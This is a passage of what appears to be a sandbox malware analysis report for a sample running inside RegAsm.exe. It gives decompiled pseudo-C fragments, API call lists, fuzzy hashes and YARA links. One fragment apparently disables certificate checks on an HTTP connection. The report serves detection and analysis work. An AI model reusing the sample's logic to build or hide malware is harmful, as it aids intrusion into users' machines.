Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: d20fe24e36c0de4290a9c8f8ec324c6336d3e7ecf2bf4419c2efedfa68805349
Instruction ID: 9649d1505683868509e54b6001df6a514d64cab89ebca637f9f30d9457e63473
Opcode Fuzzy Hash: d20fe24e36c0de4290a9c8f8ec324c6336d3e7ecf2bf4419c2efedfa68805349
Instruction Fuzzy Hash: 4BB01231244510EFCE224B40DD08F067B22B750B00F418010B284000A8C2370430EB14

Uniqueness

Uniqueness Score: -1.00%

Function 010A6855, Relevance: 3.1, APIs: 2, Instructions: 147
serviceCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E010A6855(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x10aa2d4; // 0x235d5a8
				_t4 = _t49 + 0x10ab448; // 0x34089f0
				_t5 = _t49 + 0x10ab438; // 0x9ba05972
				_t51 =  *0x10aa140(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x10aa2d4; // 0x235d5a8
						_t30 = _t56 + 0x10ab428; // 0x34089d0
						_t31 = _t56 + 0x10ab458; // 0x4c96be40
						_t58 =  *0x10aa114(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0x10aa2d4; // 0x235d5a8
											_t23 = _t76 + 0x10ab428; // 0x34089d0
											_t24 = _t76 + 0x10ab458; // 0x4c96be40
											_t105 =  *0x10aa114(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0x10aa2d4; // 0x235d5a8
													_t67 = _v28;
													_t40 = _t99 + 0x10ab418; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

0x010a6860
0x010a6862
0x010a6869
0x010a686a
0x010a686b
0x010a686c
0x010a6872
0x010a6877
0x010a6881
0x010a6888
0x010a688e
0x010a6892
0x010a6898
0x010a68a0
0x010a68a1
0x010a68a6
0x010a68a7
0x010a68a9
0x010a68ac
0x010a68ad
0x010a68ae
0x010a68b4
0x010a6949
0x010a694e
0x010a6955
0x010a695f
0x010a6965
0x010a6967
0x010a696d
0x00000000
0x010a68ba
0x010a68ba
0x010a68c1
0x010a68ca
0x010a68ce
0x010a68d4
0x010a68d7
0x010a693e
0x00000000
0x010a68d9
0x010a68d9
0x010a6970
0x010a6972
0x00000000
0x00000000
0x010a68df
0x010a68df
0x010a68df
0x010a68e6
0x010a68ec
0x010a68f1
0x010a68f9
0x010a68fa
0x010a68fb
0x010a68fd
0x010a6901
0x010a6905
0x00000000
0x010a6907
0x010a690b
0x010a6910
0x010a6917
0x010a6927
0x010a6929
0x010a692f
0x010a6934
0x010a6974
0x010a6974
0x010a6981
0x010a6985
0x010a698a
0x010a6990
0x010a6995
0x010a699f
0x010a69a1
0x010a69a7
0x010a69a7
0x010a69aa
0x010a69b0
0x00000000
0x00000000
0x00000000
0x010a6934
0x00000000
0x010a6936
0x010a6936
0x010a6937
0x00000000
0x010a693c
0x010a68d9
0x010a68d7
0x010a68ce
0x010a69b3
0x010a69b3
0x010a69b9
0x010a69b9
0x010a69c2

APIs

IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,034089D0,010A51A1,?,?,?,?,?,?,?,?,?,?,?,010A51A1), ref: 010A6921
IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,034089D0,010A51A1,?,?,?,?,?,?,?,010A51A1,00000000,00000000,00000000,006D0063), ref: 010A695F

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: QueryServiceUnknown_
String ID:
API String ID: 2042360610-0
Opcode ID: d73e87f940f8881519ce717fb2864075ef85440e46d61145ec591a3986139c78
Instruction ID: 7afde6d609b81edf7f800941a7875f532acdf5d11a4477a1e6aacdb7f737f7a2
Opcode Fuzzy Hash: d73e87f940f8881519ce717fb2864075ef85440e46d61145ec591a3986139c78
Instruction Fuzzy Hash: 97513275A0051AEFCB10CFE8C888DEEB7B9FF48710B444558E955EB250D736AD45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010A501A, Relevance: 3.1, APIs: 2, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E010A501A(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				void* _v8;
				char _v12;
				signed int _t37;
				long _t39;
				long _t40;
				signed int _t41;
				void* _t42;
				signed int _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				void* _t65;
				intOrPtr* _t67;
				intOrPtr* _t68;
				void* _t71;

				_t68 = __esi;
				_t65 = E010A6803(_t37, _a4);
				if(_t65 == 0) {
					L18:
					_t39 = GetLastError();
				} else {
					_t40 = GetVersion();
					_t71 = _t40 - 6;
					if(_t71 > 0 || _t71 == 0 && _t40 > 2) {
						_a4 = 4;
					} else {
						_a4 = 0;
					}
					__imp__(_t65, _a4, 0, 0, 0); // executed
					 *(_t68 + 0x10) = _t40;
					_t41 = E010A2625(_t65);
					if( *(_t68 + 0x10) == 0) {
						goto L18;
					} else {
						_t42 = E010A6803(_t41,  *_t68);
						_v8 = _t42;
						if(_t42 == 0) {
							goto L18;
						} else {
							_t67 = __imp__; // 0x6fa0f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t68 + 0x10), _v8, 0x50, 0);
								 *((intOrPtr*)(_t68 + 0x14)) = _t42;
								_t43 = E010A2625(_v8);
								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x100;
									_t44 = E010A6803(_t43,  *((intOrPtr*)(_t68 + 4)));
									_v8 = _t44;
									if(_t44 == 0) {
										goto L18;
									} else {
										_t45 =  *0x10aa2d4; // 0x235d5a8
										_t21 = _t45 + 0x10ab76c; // 0x450047
										_t46 = _t21;
										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t68 + 0x18)) = _t46;
										E010A2625(_v8);
										_t48 =  *((intOrPtr*)(_t68 + 0x18));
										if(_t48 == 0) {
											goto L18;
										} else {
											_v12 = 4;
											__imp__(_t48, 0x1f,  &_a4,  &_v12);
											if(_t48 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4);
											}
											_push(4);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t68 + 0x18)));
											if( *_t67() == 0) {
												goto L18;
											} else {
												_push(4);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t68 + 0x18)));
												if( *_t67() == 0) {
													goto L18;
												} else {
													_t39 = 0;
												}
											}
										}
									}
								}
							} else {
								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4);
								if(_t42 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t39;
			}

0x010a501a
0x010a5029
0x010a502f
0x010a5165
0x010a5165
0x010a5035
0x010a5035
0x010a503b
0x010a503d
0x010a504b
0x010a5046
0x010a5046
0x010a5046
0x010a5059
0x010a5060
0x010a5063
0x010a506b
0x00000000
0x010a5071
0x010a5073
0x010a507a
0x010a507d
0x00000000
0x010a5083
0x010a5086
0x010a508c
0x010a50a3
0x010a50ac
0x010a50b5
0x010a50b8
0x010a50c0
0x00000000
0x010a50c6
0x010a50ce
0x010a50d1
0x010a50da
0x010a50dd
0x00000000
0x010a50e3
0x010a50e6
0x010a50f1
0x010a50f1
0x010a50fb
0x010a5104
0x010a5107
0x010a510c
0x010a5111
0x00000000
0x010a5113
0x010a511e
0x010a5125
0x010a512d
0x010a512f
0x010a513d
0x010a513d
0x010a513f
0x010a5144
0x010a5145
0x010a5147
0x010a514e
0x00000000
0x010a5150
0x010a5150
0x010a5155
0x010a5156
0x010a5158
0x010a515f
0x00000000
0x010a5161
0x010a5161
0x010a5161
0x010a515f
0x010a514e
0x010a5111
0x010a50dd
0x010a508e
0x010a5099
0x010a509d
0x00000000
0x00000000
0x00000000
0x00000000
0x010a509d
0x010a508c
0x010a507d
0x010a506b
0x010a516e

APIs

Part of subcall function 010A6803: lstrlen.KERNEL32(?,00000000,03409CD0,7691C740,010A3EDC,03409ED5,?,?,?,?,?,69B25F44,E8FA7DD7,00000000,010A59A5), ref: 010A680A
Part of subcall function 010A6803: mbstowcs.NTDLL ref: 010A6833
Part of subcall function 010A6803: memset.NTDLL ref: 010A6845

GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,010A52F6,74E481D0,00000000,03409698,?,?,010A31C9,?,03409698,0000EA60), ref: 010A5035
GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,010A52F6,74E481D0,00000000,03409698,?,?,010A31C9,?,03409698,0000EA60), ref: 010A5165

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: ErrorLastVersionlstrlenmbstowcsmemset
String ID:
API String ID: 4097109750-0
Opcode ID: 3b110a81920f9c17193642b8c3cf45876565e908e733ce78c01009a3377f705f
Instruction ID: 9e7a1572d1b3bc33a875508255916906f392ad934942f60d5ba6ca545bc433ab
Opcode Fuzzy Hash: 3b110a81920f9c17193642b8c3cf45876565e908e733ce78c01009a3377f705f
Instruction Fuzzy Hash: D4416D71500609BFEB309FA4CC88EAB7BF9FB14784F854529F78186490E775EA44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 010A3673, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E010A3673(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E010A419E(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x10aa2d4; // 0x235d5a8
						_t20 = _t68 + 0x10ab1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E010A2480(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x010a3679
0x010a367c
0x010a368c
0x010a3695
0x010a3699
0x010a3767
0x010a376d
0x010a376d
0x010a36b3
0x010a36b8
0x010a36bc
0x010a36c2
0x010a36c7
0x010a36ce
0x010a36dd
0x010a36dd
0x010a36e1
0x010a36e3
0x010a36ef
0x010a36fa
0x010a3705
0x010a3709
0x010a3713
0x010a3717
0x010a3719
0x010a371e
0x010a3725
0x010a3735
0x010a3735
0x010a371e
0x010a3717
0x010a3737
0x010a373c
0x010a3741
0x010a3741
0x010a3747
0x010a374d
0x010a3752
0x010a3752
0x010a3757
0x010a375c
0x010a375c
0x010a3757
0x010a36e1
0x010a375e
0x010a3764
0x00000000

APIs

Part of subcall function 010A419E: SysAllocString.OLEAUT32(80000002), ref: 010A41F5
Part of subcall function 010A419E: SysFreeString.OLEAUT32(00000000), ref: 010A425A

SysFreeString.OLEAUT32(?), ref: 010A3752
SysFreeString.OLEAUT32(010A18CF), ref: 010A375C

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 911a15bcbf1d0e3c934ecdc549b14234feaab6775fdad0797bdb9b161c01cf73
Instruction ID: f147060ceb056bfd5889c238065a4e923b36f8bc1701ebc2db119eae76a9d7dc
Opcode Fuzzy Hash: 911a15bcbf1d0e3c934ecdc549b14234feaab6775fdad0797bdb9b161c01cf73
Instruction Fuzzy Hash: 3D316976600159AFCB21DF98CC88CDFBFBAFBC96447504698F9459B210D332AD51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010A1AA3, Relevance: 3.1, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E010A1AA3(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x10aa2d4; // 0x235d5a8
				_t2 = _t42 + 0x10ab468; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x10aa2d4; // 0x235d5a8
					_t6 = _t45 + 0x10ab488; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x10aa2d4; // 0x235d5a8
							_t30 = _v8;
							_t12 = _t48 + 0x10ab478; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}

0x010a1aaf
0x010a1ab0
0x010a1ab6
0x010a1abd
0x010a1abf
0x010a1ac3
0x010a1ac7
0x010a1ac9
0x010a1ad2
0x010a1ad8
0x010a1ae0
0x010a1ae2
0x010a1ae6
0x010a1ae8
0x010a1af5
0x010a1af9
0x010a1afe
0x010a1b04
0x010a1b09
0x010a1b11
0x010a1b13
0x010a1b15
0x010a1b1b
0x010a1b1b
0x010a1b1e
0x010a1b24
0x010a1b24
0x010a1b27
0x010a1b2d
0x010a1b2d
0x010a1b34

APIs

IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 010A1AE0
IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 010A1B11

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Interface_ProxyQueryUnknown_
String ID:
API String ID: 2522245112-0
Opcode ID: 11022930ac4b4ce1d6ba163d04660e60e0c7485335d13ea0d8a1ef3b0d8bb24f
Instruction ID: d68ee313cbdc4bb189bbb789fffc42e190b4896da7584e1d8524b4a31803712f
Opcode Fuzzy Hash: 11022930ac4b4ce1d6ba163d04660e60e0c7485335d13ea0d8a1ef3b0d8bb24f
Instruction Fuzzy Hash: 5D218E75A0061AEFCB00CFA8C888D9AB779FF88704B108694E945DB315DB35EE41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F1D74D, Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,03F2B7A0,-0000000C,00000000,00000000), ref: 03F1D77D
GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,03F2B7A0,-0000000C,00000000), ref: 03F1D7C4

Part of subcall function 03F04CF5: RtlFreeHeap.NTDLL(00000000,00000000,03F0194B,00000000), ref: 03F04D01

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
String ID:
API String ID: 552344955-0
Opcode ID: 4c0035a16bee496f952f24a71d8bd50caf297138f6e2f9ed04d4164a2aac222c
Instruction ID: 13814ec129c58493a749c34255a0782a1af94d4953e0ad3b402948eede0e0d86
Opcode Fuzzy Hash: 4c0035a16bee496f952f24a71d8bd50caf297138f6e2f9ed04d4164a2aac222c
Instruction Fuzzy Hash: EB11827A900209FBCB11EFA9DC84BAEFBB9EF81695F144069E801D7240DB748A15DB20

Uniqueness

Uniqueness Score: -1.00%

Function 03F1BCB0, Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,03F21CF9,69B25F44,?,?,00000000), ref: 03F1BCED
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1BD4E

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Time$FileFreeHeapSystem
String ID:
API String ID: 892271797-0
Opcode ID: 9fd420b30b953b97e6bcca2f6097542b42847a51de201e80727f77e5741f32f6
Instruction ID: 8f38d21fe6271eaeeefb7550571b82ef7e4736d8ca92082534d89f472be533e3
Opcode Fuzzy Hash: 9fd420b30b953b97e6bcca2f6097542b42847a51de201e80727f77e5741f32f6
Instruction Fuzzy Hash: 32114CB5D0020DEBDF20EBE4E944ACEB7BDEB08305F100452E501E3194D7349B54DB61

Uniqueness

Uniqueness Score: -1.00%

Function 010A35EB, Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 010A3613

Part of subcall function 010A3673: SysFreeString.OLEAUT32(?), ref: 010A3752

SafeArrayDestroy.OLEAUT32(?), ref: 010A3660

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: ArraySafe$CreateDestroyFreeString
String ID:
API String ID: 3098518882-0
Opcode ID: 29f8b0a377792c4d2cc34266481d14cbf81ba8293e29f3e428e6179231b18d9e
Instruction ID: 29dc0524a8962b2da700a9f89e11a6e14150a85a21a15c7af5374fc02479260e
Opcode Fuzzy Hash: 29f8b0a377792c4d2cc34266481d14cbf81ba8293e29f3e428e6179231b18d9e
Instruction Fuzzy Hash: 6F115E72A0050ABFDB10DFE8C845EDEBBB8EB08350F408025FA44E7161D7759A15DB91

Uniqueness

Uniqueness Score: -1.00%

Function 010A4588, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(010A5FF9), ref: 010A45A2

Part of subcall function 010A3673: SysFreeString.OLEAUT32(?), ref: 010A3752

SysFreeString.OLEAUT32(00000000), ref: 010A45E2

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: d0044e4361f3af1164cde75a1d39fc0c9a7a9e28c386e64b7d5acc1c844df62c
Instruction ID: ef382b09fb41024162a57b46ac3d8ebd123de3b43db5924a597c6499c4787602
Opcode Fuzzy Hash: d0044e4361f3af1164cde75a1d39fc0c9a7a9e28c386e64b7d5acc1c844df62c
Instruction Fuzzy Hash: DD01AD3660050ABFCB219FA8D808CDF7BB8FF48304B804021FA85E6120D7B4DA18CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 010A3238, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A3238(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E010A63A2(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x10aa290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E010A56F0(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}

0x010a3238
0x010a3240
0x010a3257
0x010a3272
0x010a3276
0x010a327b
0x010a327d
0x010a328d
0x010a3299
0x010a327f
0x010a327f
0x010a3282
0x010a3287
0x010a3287
0x010a327d
0x010a329f
0x010a32a3
0x010a32a3
0x010a324c
0x010a3251
0x010a3255
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 010A56F0: SysFreeString.OLEAUT32(00000000), ref: 010A5756

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,010A48DA,?,004F0053,03409388,00000000,?), ref: 010A3299

Strings

Ut, xrefs: 010A3299

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Free$HeapString
String ID: Ut
API String ID: 3806048269-8415677
Opcode ID: 3afa8f17fa4033947c17a727f374c8e29b18dfba530368224902f1708b5bca01
Instruction ID: db4f7ccbd5489674f3c14d6c0767f6c72849772cef72cfc41be215977254d395
Opcode Fuzzy Hash: 3afa8f17fa4033947c17a727f374c8e29b18dfba530368224902f1708b5bca01
Instruction Fuzzy Hash: 1D01E43210061ABBDB629F88DC05FEA7BA5FB14791F848029FE895E160D7329960DB90

Uniqueness

Uniqueness Score: -1.00%

Function 010A1CAF, Relevance: 3.0, APIs: 2, Instructions: 34
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A1CAF(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t17;
				WCHAR* _t19;
				void* _t20;

				_t19 = E010A4573(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t19 == 0) {
					_t20 = 8;
				} else {
					_t11 =  *0x10aa2d4; // 0x235d5a8
					_t5 = _t11 + 0x10ab9f8; // 0x43002f
					wsprintfW(_t19, _t5, 5, _a4);
					_t14 =  *0x10aa2d4; // 0x235d5a8
					_t6 = _t14 + 0x10ab918; // 0x6d0063
					_t17 = E010A559F(0, _t19, _t6, 0); // executed
					_t20 = _t17;
					E010A2625(_t19);
				}
